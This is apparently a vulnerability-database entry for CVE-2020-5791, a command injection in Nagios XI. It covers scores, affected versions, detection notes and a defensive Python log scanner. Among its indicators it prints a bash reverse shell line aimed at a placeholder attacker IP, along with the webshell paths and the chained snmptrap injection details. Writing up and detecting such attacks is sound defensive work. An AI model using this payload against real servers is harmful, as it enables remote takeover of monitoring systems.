CVE-2020-5791
published 2020-10-20


Priority: P2 · 69 · high
CVSS 3.1: 7.2 (vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Exploit: yes
EPSS: 78.63% (99.5th percentile)
Improper neutralization of special elements used in an OS command in Nagios XI 5.7.3 allows a remote, authenticated admin user to execute operating system commands with the privileges of the apache user.

Affected (2 ranges)

Vendor   Product    Version range    Fixed in
nagios   nagios_xi  (none listed)    (none listed)
nagios   nagios_xi  5.6.0 – 5.7.3    (none listed)

Detection & IOCs (extracted from sources)

url: /nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file=
path: /nagiosxi/admin/mibs.php
path: /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/scooby.php
path: /nagiosxi/includes/components/autodiscovery/jobs/scooby.php
command: ;/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1';
path: /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/snmplog.php
path: /nagiosxi/includes/components/nxti/index.php
  • Detect exploitation attempts by monitoring HTTP requests to /nagiosxi/admin/mibs.php with query parameters mode=undo-processing and type=1, especially when the 'file' parameter contains shell metacharacters (e.g., semicolons, backticks, pipe characters, or encoded equivalents).
  • Alert on creation of unexpected PHP files under /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/, which is the webshell drop location used in the PoC.
  • Monitor for outbound reverse shell connections initiated by the apache/www-data process, particularly bash spawning TCP connections via /dev/tcp.
  • Detect HTTP GET requests to newly created webshell paths such as scooby.php or snmplog.php under the autodiscovery/jobs/ directory, especially with a 'cmd' query parameter.
  • For CVE-2020-5792 (chained attack), detect requests to /nagiosxi/includes/components/nxti/index.php with mode=customTrap and custom-community values containing -d and -L flags, which are used to write arbitrary files via snmptrap argument injection.
  • Monitor for the nxti_import.php script being invoked with unsanitized file arguments, as this is the direct exec() sink for the command injection.
  • Exploitation requires authentication as a Nagios XI admin user; unauthenticated exploitation is only possible when chained with the CSRF vulnerability CVE-2020-5790 via a phishing link sent to an authenticated admin.
  • The injected commands execute as the 'apache' or 'www-data' user (not root); the exact user depends on the Nagios XI version and underlying OS.
  • The vulnerable code path is only triggered when 'type' equals MIB_UPLOAD_PROCESS_ONLY (value 1); other type values exit early and are not exploitable via this vector.
  • The mibs.php endpoint lacks CSRF protection (check_nagios_session_protector() is not called), enabling unauthenticated chaining via social engineering.
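As an added example (not code from the CVE record or from Nagios), a small Python scanner over constructed Apache access-log lines that implements the first and fourth detection points above: it flags mibs.php requests with mode=undo-processing and type=1 whose file parameter carries shell metacharacters (including double-URL-encoded ones) and requests with a cmd parameter to PHP files under autodiscovery/jobs/, while ignoring other type values as the notes describe. The log lines, IPs and file names are constructed samples.

```python
"""Detect CVE-2020-5791 exploitation attempts in Apache access logs (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (Apache common log format); not from any real system.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Oct/2020:10:00:01 +0000] "GET /nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file=foo.mib HTTP/1.1" 200 512
10.0.0.7 - - [20/Oct/2020:10:00:02 +0000] "GET /nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file=x.mib%3Bid%3B HTTP/1.1" 200 512
10.0.0.7 - - [20/Oct/2020:10:00:03 +0000] "GET /nagiosxi/includes/components/autodiscovery/jobs/scooby.php?cmd=id HTTP/1.1" 200 90
10.0.0.9 - - [20/Oct/2020:10:00:04 +0000] "GET /nagiosxi/admin/mibs.php?mode=undo-processing&type=2&file=a%60b HTTP/1.1" 200 10
"""

# Assumed log layout: client IP first, request line in double quotes.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Characters a MIB file name should never contain; any of them suggests injection.
SHELL_META = set(";`|&$\n<>(){}")
WEBSHELL_PATH_RE = re.compile(r"/nagiosxi/includes/components/autodiscovery/jobs/[^/]+\.php$")


def has_shell_meta(value: str) -> bool:
    """True if value holds a shell metacharacter, also after a second URL-decode
    (parse_qs already decoded once; this catches double-encoded payloads)."""
    return any(c in SHELL_META for c in value) or any(c in SHELL_META for c in unquote(value))


def classify(target: str):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.endswith("/nagiosxi/admin/mibs.php"):
        # Only type=1 (MIB_UPLOAD_PROCESS_ONLY) reaches the exec() sink; other values exit early.
        if qs.get("mode") == ["undo-processing"] and qs.get("type") == ["1"]:
            if any(has_shell_meta(v) for v in qs.get("file", [])):
                return "mibs.php command-injection attempt"
    if WEBSHELL_PATH_RE.search(parts.path) and "cmd" in qs:
        return "webshell access under autodiscovery/jobs/"
    return None


def scan_log(text: str):
    """Return (line_no, finding, source_ip) for each suspicious request in the log text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        finding = classify(m["target"])
        if finding:
            findings.append((n, finding, m["ip"]))
    return findings
```

Feed real access logs through scan_log to get line numbers and source addresses for triage; the type=2 line in the sample is deliberately left unflagged.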

CVSS provenance

NVD, CVSS v3.1: 7.2 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 9.0 CRITICAL, vector AV:N/AC:L/Au:S/C:C/I:C/A:C